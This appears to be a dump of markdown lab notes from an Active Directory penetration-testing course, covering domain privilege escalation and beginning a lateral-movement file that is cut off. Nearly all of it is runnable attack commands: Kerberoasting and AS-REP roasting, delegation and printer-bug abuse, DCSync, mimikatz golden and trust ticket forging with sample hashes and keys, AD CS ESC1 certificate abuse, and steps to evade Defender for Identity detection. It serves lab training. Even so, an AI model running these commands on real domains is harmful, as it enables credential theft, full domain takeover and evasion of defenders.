to execute a Silver Ticket attack to get code execution with WMI. 701 | 702 | 703 | 704 | ## **Solution** 705 | 706 | 707 | **_Coming Soon_** 708 | 709 | 710 | 711 | -------------------------------------------------------------------------------- /Domain Privilege Escalation.md: -------------------------------------------------------------------------------- 1 | **Let think of scenario's where there where no service or paths, how can we escalate privileges in an active directory environment, what are other opportunities/ways we can go about it ??** 2 | 3 | # **Kerberoast (More Effective)** 4 | 5 | 6 | ![](https://i.imgur.com/ruStWfi.png) 7 | 8 | 9 | 10 | - Offline cracking of service account passwords. 11 | - The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack. 12 | - Because (non-machine) service account passwords are not frequently changed, this has become a very popular attack! 13 | 14 | 15 | **_Example -:_** 16 | 17 | 18 | - Find user accounts used as Service accounts 19 | 20 | 21 | ```powershell 22 | # AD Module 23 | 24 | Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName 25 | 26 | # PowerView 27 | 28 | Get-DomainUser -SPN 29 | ``` 30 | 31 | > **Hint :** When you run `klist`, the SPN can be identified as the name of the {service/machine name} 32 | 33 | 34 | ![](https://i.imgur.com/S7sx0zM.png) 35 | 36 | 37 | **_Capturing Hashes :_** 38 | 39 | 40 | - Use Rubeus to list Kerberoast stats 41 | 42 | 43 | ```powershell 44 | Rubeus.exe kerberoast /stats 45 | ``` 46 | 47 | 48 | - Use Rubeus to request a TGS (This is a must run) 49 | 50 | 51 | ```powershell 52 | Rubeus.exe kerberoast /user:svcadmin /simple 53 | ``` 54 | 55 | 56 | - To avoid detections based on Encryption Downgrade for Kerberos EType (used by likes of MDI - 0x17 stands for rc4-hmac), look for Kerberoastable accounts that only support RC4_HMAC (Also must run) 57 | 58 | ```powershell 59 | Rubeus.exe kerberoast /stats /rc4opsec 60 | Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec 61 | ``` 62 | 63 | - Kerberoast all possible accounts 64 | 65 | ```powershell 66 | Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt 67 | ``` 68 | 69 | 70 | > **Note -:** You don't need invisi-shell while running `rubeus` here, it won't be stable, also the options with **must run**, must be ran as one might provide an hash and the other might not, depending on system configuration 71 | 72 | 73 | 74 | **_Cracking Hashes :_** 75 | 76 | 77 | - Crack ticket using John the Ripper 78 | 79 | 80 | ```powershell 81 | john.exe --wordlist=C:\AD\Tools\kerberoast\10k- 82 | worst-pass.txt C:\AD\Tools\hashes.txt 83 | ``` 84 | 85 | 86 | # **Learning Objective 14** 87 | 88 | - Using the Kerberoast attack, crack password of a SQL server service account. 89 | 90 | 91 | ## **Solution** 92 | 93 | 94 | **_Coming Soon_** 95 | 96 | 97 | 98 | # **Targeted Kerberoasting - AS-REPs** 99 | 100 | 101 | - If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled i.e. Kerberos preauth is disabled, it is possible to grab user's crackable AS-REP and brute-force it offline. 102 | - With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well. 103 | 104 | 105 | 106 | ![](https://i.imgur.com/MITSHLg.png) 107 | 108 | 109 | **_Example -:_** 110 | 111 | 112 | - Enumerating accounts with Kerberos Preauth disabled 113 | 114 | ```powershell 115 | # PowerView 116 | Get-DomainUser -PreauthNotRequired -Verbose 117 | 118 | # AD module 119 | Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth 120 | ``` 121 | 122 | 123 | - Force disable Kerberos Preauth 124 | - Let's enumerate the permissions for RDPUsers on ACLs using `PowerView`: 125 | 126 | ```powershell 127 | Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} 128 | 129 | Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose 130 | 131 | Get-DomainUser -PreauthNotRequired -Verbose 132 | ``` 133 | 134 | 135 | 136 | - Request encrypted AS-REP for offline brute-force. 137 | - Let's use `ASREPRoast` 138 | 139 | 140 | ```powershell 141 | Get-ASREPHash -UserName VPN1user -Verbose 142 | ``` 143 | 144 | 145 | - To enumerate all users with Kerberos preauth disabled and request a hash 146 | 147 | 148 | ```powershell 149 | Invoke-ASREPRoast -Verbose 150 | ``` 151 | 152 | 153 | - We can use John The Ripper to brute-force the hashes offline 154 | 155 | ```powershell 156 | john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst- 157 | pass.txt C:\AD\Tools\asrephashes.txt 158 | ``` 159 | 160 | 161 | 162 | # **Targeted Kerberoasting - Set SPN** 163 | 164 | - With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything (unique in the domain). 165 | - We can then request a TGS without special privileges. The TGS can then be "Kerberoasted". 166 | 167 | **_Example :_** 168 | 169 | - Let's enumerate the permissions for **RDPUsers** on ACLs using `PowerView`: 170 | 171 | ```powershell 172 | Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} 173 | ``` 174 | 175 | - See if the user already has a SPN: 176 | 177 | 178 | ```powershell 179 | # Powerview 180 | Get-DomainUser -Identity supportuser | select serviceprincipalname 181 | 182 | # AD module 183 | Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName 184 | ``` 185 | 186 | 187 | - Set a SPN for the user (must be unique for the forest) 188 | 189 | ```powershell 190 | # Powerview 191 | Set-DomainObject -Identity support1user -Set @{serviceprincipalname=‘dcorp/whatever1'} 192 | 193 | # AD module 194 | Set-ADUser -Identity support1user -ServicePrincipalNames 195 | @{Add=‘dcorp/whatever1'} 196 | ``` 197 | 198 | 199 | 200 | - Kerberoast the user 201 | 202 | 203 | 204 | ```powershell 205 | Rubeus.exe kerberoast /outfile:targetedhashes.txt john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt 206 | ``` 207 | 208 | 209 | 210 | 211 | # **Kerberos Delegation** 212 | 213 | 214 | - A user provides credentials to the Domain Controller. 215 | - The DC returns a TGT. 216 | - The user requests a TGS for the web service on Web Server. 217 | - The DC provides a TGS. 218 | - The user sends the TGT and TGS to the web server. 219 | - The web server service account use the user's TGT to request a TGS for the database server from the DC. 220 | - The web server service account connects to the database server as the user. 221 | 222 | 223 | **_Examples -:_** 224 | 225 | 226 | - Discover domain computers which have unconstrained delegation enabled : 227 | 228 | 229 | ```powershell 230 | # Powerview 231 | Get-DomainComputer -UnConstrained 232 | 233 | # AD Module 234 | Get-ADComputer -Filter {TrustedForDelegation -eq $True} 235 | Get-ADUser -Filter {TrustedForDelegation -eq $True 236 | ``` 237 | 238 | 239 | 240 | - Compromise the server(s) where Unconstrained delegation is enabled. 241 | - We must trick or wait for a domain admin to connect a service on appsrv. 242 | - Now, if the command is run again: 243 | 244 | 245 | ```powershell 246 | Invoke-Mimikatz -Command '"sekurlsa::tickets /export"' 247 | ``` 248 | 249 | 250 | - The DA token could be reused: 251 | 252 | ```powershell 253 | Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"' 254 | ``` 255 | 256 | 257 | # **Unconstrained Delegation - Printer Bug** 258 | 259 | 260 | - We can capture the TGT of dcorp-dc$ by using `Rubeus` on **dcorp-appsrv**: 261 | 262 | 263 | ```powershell 264 | Rubeus.exe monitor /interval:5 /nowrap 265 | ``` 266 | 267 | 268 | - And after that run `MS-RPRN.exe` - (https://github.com/leechristensen/SpoolSample) - on the student VM: 269 | 270 | 271 | ```powershell 272 | MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local 273 | ``` 274 | 275 | *** 276 | 277 | - If you are attacking from a Linux machine, check out Coercer - (https://github.com/p0dalirius/Coercer) - for other MS protocols that can be abused for coercion. 278 | 279 | *** 280 | 281 | - Copy the base64 encoded TGT, remove extra spaces (if any) and use it on the student VM: 282 | 283 | 284 | ```powershell 285 | Rubeus.exe ptt /tikcet: 286 | ``` 287 | 288 | 289 | - Once the ticket is injected, run `DCSync`: 290 | 291 | 292 | ```powershell 293 | Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' 294 | ``` 295 | 296 | 297 | 298 | # **Learning Objective 15** 299 | 300 | 301 | - Find a server in dcorp domain where Unconstrained Delegation is enabled. 302 | - Compromise the server and escalate to Domain Admin privileges. 303 | - Escalate to Enterprise Admins privileges by abusing Printer Bug! 304 | 305 | 306 | ## **Solution** 307 | 308 | 309 | 310 | **_Coming Soon_** 311 | 312 | 313 | 314 | # **Constrained Delegation** 315 | 316 | 317 | - To abuse constrained delegation, we need to have access to the `websvc` account. If we have access to that account, it is possible to access the services listed in **msDS-AllowedToDelegateTo** of the `websvc` account as ANY user. The service account must also have the (TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION - T2A4D) `UserAccountControl` attribute 318 | 319 | 320 | ![](https://i.imgur.com/ezTsNOd.png) 321 | 322 | 323 | 324 | **_Example_** 325 | 326 | 327 | 328 | - Enumerate users and computers with constrained delegation enabled 329 | 330 | 331 | ```powershell 332 | # PowerView 333 | Get-DomainUser -TrustedToAuth 334 | Get-DomainComputer -TrustedToAuth 335 | 336 | # AD Module 337 | Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo 338 | ``` 339 | 340 | 341 | 342 | ![](https://i.imgur.com/c767LzL.png) 343 | 344 | 345 | ## **Abusing with Kekeo** 346 | 347 | 348 | - Either plaintext password or NTLM hash/AES keys is required. We already have access to websvc's hash from dcorp-adminsrv 349 | - Using asktgt from Kekeo, we request a TGT (steps 2 & 3 in the diagram): 350 | 351 | 352 | 353 | ```powershell 354 | kekeo# tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f 355 | ``` 356 | 357 | 358 | 359 | - Using s4u from Kekeo, we request a TGS (steps 4 & 5): 360 | 361 | 362 | 363 | ```powershell 364 | tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL 365 | ``` 366 | 367 | 368 | - Using mimikatz, inject the ticket (Step 6): 369 | 370 | 371 | ```powershell 372 | Invoke-Mimikatz -Command '"kerberos::ptt 373 | TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP. 374 | MONEYCORP.LOCAL_cifs~dcorp- 375 | mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LO 376 | CAL.kirbi"' 377 | ``` 378 | 379 | 380 | - you can now run command on remote system ( **msDS-AllowedToDelegateTo**) 381 | 382 | 383 | ``` 384 | ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$ 385 | ``` 386 | 387 | 388 | 389 | 390 | ## **Abusing with Rubeus** 391 | 392 | 393 | 394 | - We can use the following command (We are requesting a TGT and TGS in a single command): 395 | 396 | 397 | 398 | ```powershell 399 | Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /ptt 400 | ``` 401 | 402 | 403 | - you can now run command on remote system ( **msDS-AllowedToDelegateTo**) 404 | 405 | 406 | 407 | ```powershell 408 | ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$ 409 | ``` 410 | 411 | 412 | ## **Constrained Delegation - Service Abuse** 413 | 414 | - Another interesting issue in Kerberos is that the delegation occurs not only for the specified service but for any service running under the same account. There is no validation for the SPN specified. 415 | - This is huge as it allows access to many interesting services when the delegation may be for a non-intrusive service! 416 | 417 | 418 | 419 | 420 | - Enumerate users and computers with constrained delegation enabled 421 | 422 | 423 | ```powershell 424 | # PowerView 425 | Get-DomainUser -TrustedToAuth 426 | Get-DomainComputer -TrustedToAuth 427 | 428 | # AD Module 429 | Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo 430 | ``` 431 | 432 | 433 | ![](https://i.imgur.com/3ymZaqa.png) 434 | 435 | 436 | 437 | - Abusing with `Rubeus` 438 | 439 | 440 | - We can use the following command (We are requesting a TGT and TGS in a single command): 441 | 442 | 443 | ```powershell 444 | Rubeus.exe s4u /user:dcorp-adminsrv$ /aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b445 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt 445 | ``` 446 | 447 | - After injection, we can run `DCSync`: 448 | 449 | 450 | ```powershell 451 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" 452 | ``` 453 | 454 | 455 | 456 | # **Learning Objective 16** 457 | 458 | 459 | 460 | - [ ] Enumerate users in the domain for whom Constrained Delegation is enabled. 461 | - For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured. 462 | - Pass the ticket and access the service as DA. 463 | - [ ] Enumerate computer accounts in the domain for which Constrained Delegation is enabled. 464 | - For such a user, request a TGT from the DC. 465 | - Use the TGS for executing the DCSync attack. 466 | 467 | 468 | ## **Solution** 469 | 470 | 471 | **_Coming Soon_** 472 | 473 | 474 | 475 | # **Resource-based Constrained Delegation** 476 | 477 | 478 | - To abuse RBCD in the most effective form, we just need two privileges. 479 | 480 | 1. Write permissions over the target service or object to configure msDS-AllowedToActOnBehalfOfOtherIdentity. 481 | 2. Control over an object which has SPN configured (like admin access to a domain joined machine or ability to join a machine to domain - ms-DS-MachineAccountQuota is 10 for all domain users) 482 | 3. We already have admin privileges on student VMs that are domain joined machines. 483 | 4. Enumeration would show that the user **'ciadmin'** has Write permissions over the dcorp-mgmt machine! 484 | 485 | ```powershell 486 | Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'} 487 | ``` 488 | 489 | 490 | - Using the ActiveDirectory module, configure RBCD on `dcorp-mgmt` for student machines : 491 | 492 | 493 | ```powershell 494 | $comps = 'dcorp-student1$','dcorp-student2$' Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount $comps 495 | ``` 496 | 497 | 498 | - Now, let's get the privileges of `dcorp-studentx$` by extracting its AES keys: 499 | 500 | 501 | ```powershell 502 | Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 503 | ``` 504 | 505 | 506 | 507 | ![](https://i.imgur.com/d6NEWHh.png) 508 | 509 | 510 | > **Note -:** With the above command we wanna extract the AES key for 'dcorp-student1$', which we will use with `rubeus` to access `dcorp-mgmt`, however you might find multiple accounts for this user, so you should take note of this SID - `S-1-5-18` - as this is the SI for system account and that is what we want 511 | 512 | 513 | - Use the AES key of `dcorp-studentx$` with `Rubeus` and access dcorp-mgmt as ANY user we want: 514 | 515 | ```powershell 516 | Rubeus.exe s4u /user:dcorp-student1$ 517 | /aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d 518 | 83b9e6b7fc7897c2 /msdsspn:http/dcorp-mgmt 519 | /impersonateuser:administrator /ptt 520 | ``` 521 | 522 | 523 | - We can then use `winrs` to access remote system, in this case `dcorp-mgmt` 524 | 525 | 526 | ```powershell 527 | winrs -r:dcorp-mgmt cmd 528 | ``` 529 | 530 | ^b6965a 531 | 532 | # **Learning Objective 17** 533 | 534 | 535 | - Find a computer object in dcorp domain where we have Write permissions. 536 | - Abuse the Write permissions to access that computer as Domain Admin. 537 | 538 | ## **Solution** 539 | 540 | **_Coming Soon_** 541 | 542 | 543 | # **Across Trusts** 544 | 545 | 546 | - Across Domains - Implicit two way trust relationship. 547 | - Across Forests - Trust relationship needs to be established. 548 | 549 | 550 | 551 | ![](https://i.imgur.com/HzxGZe6.png) 552 | 553 | 554 | 555 | # **Child to Parent** 556 | 557 | 558 | - sIDHistory is a user attribute designed for scenarios where a user is moved from one domain to another. When a user's domain is changed, they get a new SID and the old SID is added to sIDHistory. 559 | - sIDHistory can be abused in two ways of escalating privileges within a forest: 560 | - krbtgt hash of the child 561 | - Trust tickets 562 | 563 | 564 | 565 | ## **Child to Parent using Trust Tickets** 566 | 567 | 568 | 569 | 1. So, what is required to forge trust tickets is, obviously, the trust key. Look for [In] trust key from child to parent. 570 | 571 | 572 | 573 | ```powershell 574 | Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc 575 | ``` 576 | 577 | OR 578 | 579 | 580 | ```powershell 581 | Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"' 582 | ``` 583 | 584 | 585 | OR 586 | 587 | ```powershell 588 | Invoke-Mimikatz -Command '"lsadump::lsa /patch"' 589 | ``` 590 | 591 | 592 | ![](https://i.imgur.com/tglgutQ.png) 593 | 594 | 595 | 596 | 597 | 2. We can then forge and inter-realm TGT: 598 | 599 | 600 | ```powershell 601 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:e9ab2e57f6397c19b62476e98e9521ac /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit" 602 | ``` 603 | 604 | 605 | |Option|Description| 606 | |---|---| 607 | |Kerberos::golden|The mimikatz module| 608 | |/domain|FQDN of the current domain| 609 | |/sid|SID of the current domain| 610 | |/sids|SID of the enterprise admins group of the parent domain| 611 | |/rc4|RC4 of the trust key| 612 | |/user|User to impersonate| 613 | |/service|Target service in the parent domain| 614 | |/target|FQDN of the parent domain| 615 | |/ticket|Path where the ticket is to be saved (e.g., C:\AD\Tools\trust_tkt.kirbi)| 616 | 617 | 618 | 3. Note that we are still using the TGT forged initially 619 | 620 | 621 | ```powershell 622 | Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt 623 | ``` 624 | 625 | 626 | 4. Run command on remote system 627 | 628 | ```powershell 629 | ls \\mcorp-dc.moneycorp.local\c$ 630 | ``` 631 | 632 | 633 | > This is how to escalate from child of root 634 | 635 | 636 | # **Learning Objective 18** 637 | 638 | 639 | Using DA access to `dollarcorp.moneycorp.local`, escalate privileges to 640 | Enterprise Admin or DA to the parent domain, `moneycorp.loca`l using 641 | the domain trust key. 642 | 643 | ## **Solution** 644 | 645 | **_Coming Soon_** 646 | 647 | 648 | 649 | # **Child to Parent (Alternative) - using krbtgt hash** 650 | 651 | 652 | - We will abuse sIDhistory once again 653 | 654 | 655 | ```powershell 656 | Invoke-Mimikatz -Command '"lsadump::lsa /patch"' 657 | ``` 658 | 659 | 660 | 661 | ```powershell 662 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit" 663 | ``` 664 | 665 | 666 | - In the above command, the mimkatz option **"/sids"** is forcefully setting the `sIDHistory` for the Enterprise Admin group for `dollarcorp.moneycorp.local` that is the Forest Enterprise Admin Group. 667 | 668 | 669 | - On any machine of the current domain 670 | 671 | ```powershell 672 | Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"' 673 | ``` 674 | 675 | - We can now run commands on the remote machine 676 | 677 | ```powershell 678 | ls \\mcorp-dc.moneycorp.local.kirbi\c$ 679 | ``` 680 | 681 | ```powershell 682 | gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local 683 | ``` 684 | 685 | 686 | - If you can't access shell on the remote system with `winrs`, in case you get an error as shown in the screen shot below, here is what to do to get a shell 🤟 (DCsync) 687 | 688 | ![](https://i.imgur.com/3MYuknZ.png) 689 | 690 | 691 | 1. Run the `dcsync` attack against the krbtgt hash of the forest root 692 | 693 | ```powershell 694 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\administrator /domain:moneycorp.local" "exit" 695 | ``` 696 | 697 | 698 | 2. Now use over-passthehash to start a process as the administrator of `moneycorp.local` of this domain we want the request to be sent to 699 | 700 | 701 | ```powershell 702 | C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /aes256:a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show/ptt 703 | ``` 704 | 705 | 706 | 707 | - You should now have a new process running as domain administrator of `mcorp-dc`, run the `winrs` command again and you should have shell access 708 | 709 | 710 | 711 | ```powershell 712 | winrs -r:mcorp-dc cmd 713 | ``` 714 | 715 | 716 | 717 | ![](https://i.imgur.com/mE1snGK.png) 718 | 719 | 720 | 721 | - Avoid suspicious logs by using Domain Controllers group (Bypass MDI Detection) 722 | 723 | 724 | ```powershell 725 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:dcorp-dc$ /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit" 726 | ``` 727 | 728 | 729 | ```powershell 730 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit" 731 | ``` 732 | 733 | 734 | **_Domain SID's -:_** 735 | 736 | - S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers 737 | - S-1-5-9 - Enterprise Domain Controllers 738 | 739 | 740 | 741 | # **Learning Objective 19** 742 | 743 | 744 | - Using DA access to `dollarcorp.moneycorp.local`, escalate privileges to Enterprise Admin or DA to the parent domain, `moneycorp.local` using **dollarcorp's** krbtgt hash. 745 | 746 | 747 | ## **Solution** 748 | 749 | 750 | **_Coming Soon_** 751 | 752 | 753 | # **Trust Flow Across Forest** 754 | 755 | 756 | ![](https://i.imgur.com/Y447iH2.png) 757 | 758 | 759 | # **Trust Abuse Across Forest** 760 | 761 | 762 | ![](https://i.imgur.com/91VXRiY.png) 763 | 764 | 765 | 766 | # **Across Forest using Trust Tickets** 767 | 768 | 769 | - Once again, we require the trust key for the inter-forest trust. 770 | 771 | 772 | ```powershell 773 | Invoke-Mimikatz -Command '"lsadump::trust /patch"' 774 | ``` 775 | 776 | Or 777 | 778 | ```powershell 779 | Invoke-Mimikatz -Command '"lsadump::lsa /patch"' 780 | ``` 781 | 782 | 783 | 784 | 785 | 786 | 787 | - An inter-forest TGT can be forged 788 | 789 | 790 | ```powershell 791 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:2756bdf7dd8ba8e9c40fe60f654115a0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit" 792 | ``` 793 | 794 | 795 | - Abuse with Rubeus 796 | - Using the same TGT which we forged earlier: 797 | 798 | ```powershell 799 | Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt 800 | ``` 801 | 802 | 803 | - Now we can run commands on remote systems 804 | 805 | 806 | ```powershell 807 | ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\ 808 | ``` 809 | 810 | 811 | 812 | # **Learning Objective 20** 813 | 814 | 815 | - With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest. 816 | 817 | 818 | ## **Solution** 819 | 820 | **_Coming Soon_** 821 | 822 | 823 | 824 | 825 | # **Across domain trusts - AD CS** 826 | 827 | 828 | Active Directory Certificate Services (AD CS) enables use of Public Key Infrastructure (PKI) in active directory forest. 829 | 830 | 831 | 832 | 833 | ![](https://i.imgur.com/4zrTpzL.png) 834 | 835 | 836 | {**_Refer To PDF For More Explanation_**} 837 | 838 | *** 839 | 840 | **Practical Example -:** 841 | 842 | - We can use the Certify tool (https://github.com/GhostPack/Certify) to enumerate (and for other attacks) AD CS in the target forest: 843 | 844 | 845 | ```powershell 846 | Certify.exe cas 847 | ``` 848 | 849 | - Enumerate the templates.: 850 | 851 | ```powershell 852 | Certify.exe find 853 | ``` 854 | 855 | - Enumerate vulnerable templates: 856 | 857 | ```powershell 858 | Certify.exe find /vulnerable 859 | ``` 860 | 861 | 862 | - In moneycorp, there are multiple misconfigurations in AD CS. 863 | - Common requirements/misconfigurations for all the Escalations that we have in the lab (ESC1, ESC3 and ESC6) 864 | - CA grants normal/low-privileged users enrollment rights 865 | - Manager approval is disabled 866 | - Authorization signatures are not required 867 | - The target template grants normal/low-privileged users enrollment rights 868 | 869 | 870 | 871 | **_Exploiting ESC1** 872 | 873 | 874 | At the below image when we run - `C:\AD\Tools\Certify.exe /enrolleeSuppliesSubject` - We get this information, let break it down 🙂 875 | 876 | 877 | - The `Template Name` session is the name of the Template 878 | - The `Enrollments Rights` shows the users who can request certificate from the template 879 | - In this case we can't because we are not **Domain Admin** nor **Enterprise Admin** 880 | - The `ENROLLEE_SUPPLIES_SUBJECT` is also enabled 881 | - All conditions met except that we are not **Domain Admin** nor **Enterprise Admin** 882 | 883 | 884 | 885 | ![](https://i.imgur.com/BZTno1k.png) 886 | 887 | 888 | **WHILE** 889 | 890 | - We can see the template name below 891 | - `ENROLLEE_SUPPLIES_SUBJECT` is also enabled 892 | - We have the users that can request certificates in which `RDPUsers`, the group that all of the student users are a member of. 893 | - Cool we can go ahead and use this 894 | 895 | 896 | 897 | ![](https://i.imgur.com/IsyR86f.png) 898 | 899 | 900 | 901 | - The template "HTTPSCertificates" allows enrollment to the RDPUsers group. Request a certificate for DA (or EA) as studentx 902 | 903 | 904 | ```powershell 905 | Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator 906 | ``` 907 | 908 | 909 | - Copy the output of both the **RSA Private Key** and the **Certificate** 910 | - Open up Notepad and paste into it 911 | - Then save it with the name `esc1.pem` 912 | 913 | ![](https://i.imgur.com/niHO6bN.png) 914 | 915 | 916 | - Run the below command to convert `esc1.pem` to a `.pfx` file so our tool `rubeus` will understand this format 917 | 918 | 919 | ```powershell 920 | C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx 921 | ``` 922 | 923 | 924 | > If you are asked for a password in the lab, use **secretpassword123** 925 | 926 | 927 | 928 | - Convert from cert.pem to pfx (esc1.pfx below) and use it to request a TGT for DA (or EA). 929 | 930 | ```powershell 931 | Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:SecretPass@123 /ptt 932 | ``` 933 | 934 | 935 | 936 | We should now have access to DC as domain admin 937 | 938 | 939 | ![](https://i.imgur.com/0kZcMqh.png) 940 | 941 | 942 | **Escalation to Enterprise Admin** 943 | 944 | We can also go ahead and collect both the `Private Key` and `Certificates` for `mcorp-dc` 945 | 946 | 947 | ```powershell 948 | Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator 949 | ``` 950 | 951 | - save output as usual into notepad and save with extension `"esc1-EA.pem"` 952 | 953 | 954 | 955 | ![](https://i.imgur.com/RQFiyJK.png) 956 | - Convert 957 | 958 | ```powershell 959 | C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -ex port -out C:\AD\Tools\esc1-EA.pfx 960 | ``` 961 | 962 | - Request TGT for `mcorp-dc` 963 | 964 | ```powershell 965 | Rubeus.exe asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:C:\AD\Tools\esc1-EA.pfx /password:SecretPass@123 /ptt 966 | ``` 967 | 968 | - Access `mcorp-dc` 969 | 970 | ![](https://i.imgur.com/HwJWYTN.png) 971 | 972 | 973 | 974 | # **Learning Objective 21** 975 | 976 | 977 | - Check if AD CS is used by the target forest and find any vulnerable/abusable templates. 978 | - Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin. 979 | 980 | 981 | ## **Solution** 982 | 983 | 984 | **_Coming Soon_** 985 | 986 | 987 | 988 | -------------------------------------------------------------------------------- /Lateral Movement.md: -------------------------------------------------------------------------------- 1 | # **Lateral Movement - PowerShell Remoting** 2 | 3 | - Think of **powershell remoting** (PSRemoting) as psexec on steroids but much more silent and super fast! 4 | - PSRemoting uses Windows Remoting Management (WinRM) which is Microsoft's implementation of WS-Management. 5 | - Enabled by default on Server 2012 onwards with a firewall exception. 6 | - Uses WinRM and listens by default on 5985 (HTTP) and 5986 (HTTPS) 7 | - It is the recommended way to manage windows Cores servers. 8 | - You may need to enable remoting (Enable-PSRemoting) on a Desktop Windows machine, Admin privileges are required to do that. 9 | - The remoting process runs as a high integrity process. That is, you get an elevated shell. 10 | 11 | 12 | ## **There are two ways of remoting to a machine** 13 | 14 | - [ ] **One-to-One** 15 | - PSSession 16 | - Interactive 17 | - Runs in a new process (wsmprovhost) 18 | - 